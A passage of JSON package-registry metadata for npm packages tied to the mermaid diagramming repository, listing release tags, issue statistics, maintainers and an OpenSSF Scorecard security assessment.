https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2025-09-01T14:17:50.517Z","dependent_packages_count":0,"downloads":2,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":33.35981289358473,"dependent_packages_count":47.757943799664574,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":40.55887834662465},"purl":"pkg:npm/%40eten-lab/mermaid-monorepo","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@eten-lab/mermaid-monorepo","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@eten-lab/mermaid-monorepo","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@eten-lab/mermaid-monorepo/dependencies","status":null,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2025-09-01T14:01:58.757Z","issues_count":1461,"pull_requests_count":1558,"avg_time_to_close_issue":27677984.852564104,"avg_time_to_close_pull_request":2277072.9893004117,"issues_closed_count":466,"pull_requests_closed_count":1215,"pull_request_authors_count":359,"issue_authors_count":1156,"avg_comments_per_issue":3.5578370978781657,"avg_comments_per_pull_request":4.093709884467266,"merged_pull_requests_count":970,"bot_issues_count":4,"bot_pull_requests_count":290,"past_year_issues_count":428,"past_year_pull_requests_count":712,"past_year_avg_time_to_close_issue":2790098.3866666667,"past_year_avg_time_to_close_pull_request":1391392.070539419,"past_year_issues_closed_count":75,"past_year_pull_requests_closed_count":482,"past_year_pull_request_authors_count":162,"past_year_issue_authors_count":345,"past_year_avg_comments_per_issue":0.7616822429906542,"past_year_avg_comments_per_pull_request":4.254213483146067,"past_year_bot_issues_count":2,"past_year_bot_pull_requests_count":155,"past_year_merged_pull_requests_count":374,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":251,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yokozuna59","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"ashishjain0512","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"Yash-Singh1","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"NicolasNewman","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"GDFaber","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"}],"active_maintainers":[{"login":"sidharthv96","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"knsv","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"huynhicode","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"ashishjain0512","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"aloisklink","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"NicolasNewman","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@eten-lab%2Fmermaid-monorepo/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@eten-lab%2Fmermaid-monorepo/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@eten-lab%2Fmermaid-monorepo/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@eten-lab%2Fmermaid-monorepo/related_packages","maintainers":[{"uuid":"hiroshit","login":"hiroshit","name":null,"email":"hiroshi.tan57@gmail.com","url":null,"packages_count":14,"html_url":"https://www.npmjs.com/~hiroshit","role":null,"created_at":"2024-02-27T17:02:44.956Z","updated_at":"2024-02-27T17:02:44.956Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/hiroshit/packages"},{"uuid":"etenlab","login":"etenlab","name":null,"email":"admin@lab.eten.bible","url":null,"packages_count":11,"html_url":"https://www.npmjs.com/~etenlab","role":null,"created_at":"2024-02-27T17:02:45.130Z","updated_at":"2024-02-27T17:02:45.130Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/etenlab/packages"},{"uuid":"cwshkut","login":"cwshkut","name":null,"email":"alexey.shkut@clockwise.software","url":null,"packages_count":11,"html_url":"https://www.npmjs.com/~cwshkut","role":null,"created_at":"2024-02-27T17:02:44.823Z","updated_at":"2024-02-27T17:02:44.823Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/cwshkut/packages"},{"uuid":"daniel-leod","login":"daniel-leod","name":null,"email":"danielld707@gmail.com","url":null,"packages_count":10,"html_url":"https://www.npmjs.com/~daniel-leod","role":null,"created_at":"2024-02-27T17:02:44.651Z","updated_at":"2024-02-27T17:02:44.651Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/daniel-leod/packages"},{"uuid":"foreveryoung12","login":"foreveryoung12","name":null,"email":"siafin2010@gmail.com","url":null,"packages_count":11,"html_url":"https://www.npmjs.com/~foreveryoung12","role":null,"created_at":"2024-02-27T17:02:44.502Z","updated_at":"2024-02-27T17:02:44.502Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/foreveryoung12/packages"},{"uuid":"0xle0x","login":"0xle0x","name":null,"email":"devgru0114@gmail.com","url":null,"packages_count":9,"html_url":"https://www.npmjs.com/~0xle0x","role":null,"created_at":"2024-02-27T17:02:44.183Z","updated_at":"2024-02-27T17:02:44.183Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/0xle0x/packages"},{"uuid":"aslambabu","login":"aslambabu","name":null,"email":"aslambabu@gmail.com","url":null,"packages_count":7,"html_url":"https://www.npmjs.com/~aslambabu","role":null,"created_at":"2024-02-27T17:02:44.000Z","updated_at":"2024-02-27T17:02:44.000Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/aslambabu/packages"},{"uuid":"takeshisuz","login":"takeshisuz","name":null,"email":"takeshisuz57@gmail.com","url":null,"packages_count":10,"html_url":"https://www.npmjs.com/~takeshisuz","role":null,"created_at":"2024-02-27T17:02:43.879Z","updated_at":"2024-02-27T17:02:43.879Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/takeshisuz/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5131348,"maintainers_count":1051627,"namespaces_count":313328,"keywords_count":730052,"github":"npm","metadata":{"funded_packages_count":155759},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-05T07:36:50.205Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":8713747,"name":"mermaid-elk","ecosystem":"npm","description":"Markdown-ish syntax for generating flowcharts, sequence diagrams, class diagrams, gantt charts and git graphs.","homepage":"https://github.com/mermaid-js/mermaid#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":["diagram","markdown","flowchart","sequence diagram","gantt","class diagram","git graph"],"namespace":null,"versions_count":2,"first_release_published_at":"2024-01-03T07:33:42.384Z","latest_release_published_at":"2024-04-24T09:20:26.624Z","latest_release_number":"10.9.0","last_synced_at":"2025-09-01T12:55:56.568Z","created_at":"2024-01-03T07:35:17.247Z","updated_at":"2025-09-01T14:17:50.353Z","registry_url":"https://www.npmjs.com/package/mermaid-elk","install_command":"npm install mermaid-elk","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"10.9.0"}},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2025-09-01T12:33:10.000Z","size":254429,"stargazers_count":82566,"open_issues_count":1425,"forks_count":7984,"subscribers_count":651,"default_branch":"develop","last_synced_at":"2025-09-01T12:37:01.437Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2025-09-01T12:31:32.000Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":8230,"total_committers":688,"mean_commits":"11.962209302325581","dds":0.823086269744836,"last_synced_commit":"b3dee343d1536c8425539643c345a63ff58f59f4"},"previous_names":["knsv/mermaid"],"tags_count":181,"template":false,"template_full_name":null,"purl":"pkg:github/mermaid-js/mermaid","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/sbom","scorecard":{"id":355670,"data":{"date":"2025-08-17T15:35:22Z","repo":{"name":"github.com/mermaid-js/mermaid","commit":"1f46c9e9bb556f9c321118407d0fa6788746e8b9"},"scorecard":{"version":"v5.1.1","commit":"cd152cb6742c5b8f2f3d2b5193b41d9c50905198"},"score":6.7,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#packaging"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: jobLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:21","Info: jobLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:21","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/build-docs.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/check-readme-in-sync.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e-applitools.yml:17","Warn: topLevel 'contents' permission set to 'write': .github/workflows/e2e-timings.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-triage.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:23","Warn: topLevel 'contents' permission set to 'write': .github/workflows/lint.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/publish-docs.yml:11","Warn: no topLevel permission defined: .github/workflows/release-preview-publish.yml:1","Warn: topLevel 'actions' permission set to 'write': .github/workflows/release-preview.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/release.yml:11","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:6","Warn: no topLevel permission defined: .github/workflows/unlock-reopened-issues.yml:1","Warn: no topLevel permission defined: .github/workflows/update-browserlist.yml:1","Warn: no topLevel permission defined: .github/workflows/validate-lockfile.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/release-preview-publish.yml:32","Info:  45 out of  47 GitHub-owned GitHubAction dependencies pinned","Info:  35 out of  36 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#signed-releases"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#license"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 28 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#sast"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found linked content: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found text in security policy: github.com/mermaid-js/.github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#security-policy"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch 'release/10.9.3'","Warn: branch protection not enabled for branch 'release/10.9.2'","Info: 'allow deletion' disabled on branch 'develop'","Info: 'force pushes' disabled on branch 'develop'","Warn: branch 'develop' does not require approvers","Warn: codeowners review is not required on branch 'develop'","Info: status check found to merge onto on branch 'develop'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":9,"reason":"11 out of 12 merged PRs checked by a CI test -- score normalized to 9","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 15 contributing companies or organizations","details":["Info: found contributions from: Mermaid-Chart, OSDKDev, argoproj, check-spelling, evolutionizer, fossgect, garnercorp, gecthrissur, john deere, mermaid chart, mermaid-chart, mermaid-js, plantuml-stdlib, ringcentral, sarva"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., 